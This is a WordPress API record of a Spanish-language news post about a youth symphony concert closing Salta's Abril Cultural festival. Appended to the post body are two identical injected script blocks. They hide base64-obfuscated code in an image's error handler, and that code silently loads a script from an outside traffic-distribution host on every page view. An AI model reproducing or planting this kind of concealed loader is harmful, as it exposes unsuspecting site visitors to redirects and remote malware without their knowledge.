{"id":3958,"date":"2024-04-30T12:19:58","date_gmt":"2024-04-30T15:19:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3958"},"modified":"2025-08-13T23:56:35","modified_gmt":"2025-08-14T02:56:35","slug":"cierre-del-abril-cultural-salteno-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3958","title":{"rendered":"Cierre del Abril Cultural Salte\u00f1o en el Teatro Provincial"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f1d528fe7e149bc4bd6f1ad2f2e22ed8\" style=\"background-color:#7d0825\"><em>Desde las 21 hs, la Orquesta Sinf\u00f3nica Infantil y Juvenil presentar\u00e1 hoy un espect\u00e1culo, junto a invitados y artistas destacados. La entrada ser\u00e1 libre y gratuita.<\/em><\/h3>\n\n\n\n<p>La&nbsp;<strong>Orquesta Sinf\u00f3nica Infantil y Juveni<\/strong>l, ser\u00e1 la encargada del cierre del 47\u00b0 Abril Cultural Salte\u00f1o y lo har\u00e1 con un concierto, esta noche, desde las 21, en el Teatro Provincial, con entrada libre y gratuita.<\/p>\n\n\n\n<p>El programa incluir\u00e1 una selecci\u00f3n de agrupaciones musicales y su inicio estar\u00e1 a cargo del bloque de coros Invitados, seguido de presentaciones de los Grupos de Extensi\u00f3n de la Orquesta Sinf\u00f3nica Infantil y Juvenil de Salta, como el Ensamble de Vientos \u201cRogelio Riggio\u201d y el Ensamble de Cuerdas \u201cC\u00e9sar Casas\u201d.<\/p>\n\n\n\n<p>La velada continuar\u00e1 con interpretaciones musicales a cargo de la Orquesta Infantil y la Orquesta Juvenil, dirigidas por Carolina Pineda Andrade y Mart\u00edn D\u00b4El\u00eda respectivamente, junto al Coro de Personas Mayores.<\/p>\n\n\n\n<p>Finalmente, se realizar\u00e1 un homenaje al Maestro Antonio Montero, en reconocimiento a su invaluable contribuci\u00f3n al mundo de la m\u00fasica en Salta y su legado perdurable.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cierre-del-abril-cultural-saltenio-en-el-teatro-provincial-95388\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde las 21 hs, la Orquesta Sinf\u00f3nica Infantil y Juvenil presentar\u00e1 hoy un espect\u00e1culo, junto a invitados y artistas destacados. La entrada ser\u00e1 libre y gratuita. La&nbsp;Orquesta Sinf\u00f3nica Infantil y Juvenil, ser\u00e1 la encargada del cierre del 47\u00b0 Abril Cultural Salte\u00f1o y lo har\u00e1 con un concierto, esta noche, desde las 21, en el Teatro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3959,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3958","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3958"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3958"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3958\/revisions"}],"predecessor-version":[{"id":6795,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3958\/revisions\/6795"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3959"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}